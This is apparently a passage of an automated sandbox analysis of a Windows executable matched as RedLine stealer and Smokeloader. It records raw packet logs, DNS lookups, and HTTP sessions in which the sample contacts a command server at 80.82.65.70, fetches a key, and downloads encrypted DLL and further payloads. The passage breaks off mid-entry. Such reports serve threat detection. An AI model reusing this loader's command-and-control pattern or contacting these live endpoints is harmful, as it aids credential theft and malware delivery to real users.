                                              Dec 13, 2024 10:49:17.537487030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.538430929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.538443089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.538496971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.539366007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.539437056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.539462090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.539561987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.540282965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.540498018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601051092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601151943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601166010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601257086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601442099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601672888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601696014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601757050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601778984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.602078915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.602565050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.602791071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.602837086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.603490114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.603624105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.603770018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.603844881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.604413033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.604605913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.604820967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.605309963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.605370998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.605482101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.605576992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.606378078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.606396914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.606455088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.607162952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.607358932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.607383013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.607453108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.608151913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.608202934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.608628988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.608767033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.609076977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.609126091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.609137058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.609386921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.610066891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610083103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610809088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.610896111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610975981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.611076117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.611746073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.611797094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.611869097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612014055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.612696886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612747908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.612823963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612947941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.613578081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.613627911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.613980055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.614141941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.614576101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.614756107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.614819050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615063906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.615588903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615602970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615689993 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.616393089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.616511106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.616565943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.617495060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.617507935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.617571115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.617571115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.618292093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.618362904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.618376017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.618482113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.619172096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.619344950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.619363070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.619462013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620135069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.620191097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620292902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.620373011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620987892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.621110916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.621123075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.621258974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.622812033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622827053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622850895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622873068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.622924089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.623357058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623694897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.623797894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623811007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623852968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.624815941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.624829054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.624876022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.625066042 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.625669003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.625690937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.625749111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.626559019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.626677990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.626766920 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.626844883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.627552032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.627665997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.627722979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.628173113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.711271048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711289883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711378098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.711528063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711544037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711792946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.712425947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.712443113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.712464094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.712508917 CET4985880192.168.2.680.82.65.70
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 13, 2024 10:48:11.256686926 CET | 1.1.1.1 | 192.168.2.6 | 0x78d0 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 13, 2024 10:48:11.256686926 CET | 1.1.1.1 | 192.168.2.6 | 0x78d0 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                              Dec 13, 2024 10:49:16.220664978 CET | 1.1.1.1 | 192.168.2.6 | 0xc04f | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 13, 2024 10:49:16.220664978 CET | 1.1.1.1 | 192.168.2.6 | 0xc04f | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false
                                              Dec 13, 2024 10:49:16.220664978 CET | 1.1.1.1 | 192.168.2.6 | 0xc04f | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false
                                              Dec 13, 2024 10:49:21.219228983 CET | 1.1.1.1 | 192.168.2.6 | 0x9c1a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                              Dec 13, 2024 10:49:21.219228983 CET | 1.1.1.1 | 192.168.2.6 | 0x9c1a | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                              • 80.82.65.70
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.6 | 49761 | 80.82.65.70 | 80 | 7480 | C:\Users\user\Desktop\file.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 13, 2024 10:48:40.287070036 CET | 412 | OUT | GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:41.645437956 CET | 204 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:41 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:41.700670004 CET | 386 | OUT | GET /dll/key HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:42.177689075 CET | 224 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:41 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 21
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                              Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                              Dec 13, 2024 10:48:42.185626030 CET | 391 | OUT | GET /dll/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:42.752149105 CET    1236    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:42 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                              Content-Length: 97296
                                              Keep-Alive: timeout=5, max=98
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream
                                              Dec 13, 2024 10:48:43.250017881 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:43.736414909 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:43 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=97
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:45.778191090 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:46.273844004 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:45 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=96
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:48.339608908 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:48.834713936 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:48 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=95
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:50.886564016 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:51.369728088 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:51 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=94
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:53.402832031 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:53.714023113 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:53.891000032 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:53 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=93
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:55.964778900 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:56.470319986 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:56 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=92
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:58.496692896 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:58.998207092 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:58 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=91
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:01.028338909 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:01.519903898 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:01 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=90
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:03.652170897 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:04.136853933 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:03 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=89
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:06.324368000 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:06.817585945 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:06 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=88
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:08.980671883 CET    393    OUT    GET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:09.481319904 CET    203    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:09 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=87
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0


                                              Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                              1    192.168.2.6    49858    80.82.65.70    80    7480    C:\Users\user\Desktop\file.exe
                                              Timestamp    Bytes transferred    Direction    Data
                                              Dec 13, 2024 10:49:12.694344044 CET    392    OUT    GET /soft/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: d
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:14.179785967 CET    1236    IN    HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:13 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="dll";
                                              Content-Length: 242176
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream
                                              Dec 13, 2024 10:49:15.043659925 CET  392  OUT  GET /soft/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: s
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:15.790117025 CET  1236  IN  HTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:15 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="soft";
                                              Content-Length: 1502720
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream

                                              Target ID:0
                                              Start time:04:48:14
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:1'966'080 bytes
                                              MD5 hash:2E164F8EB316718AE1C48ED84E05DC9F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:04:49:17
                                              Start date:13/12/2024
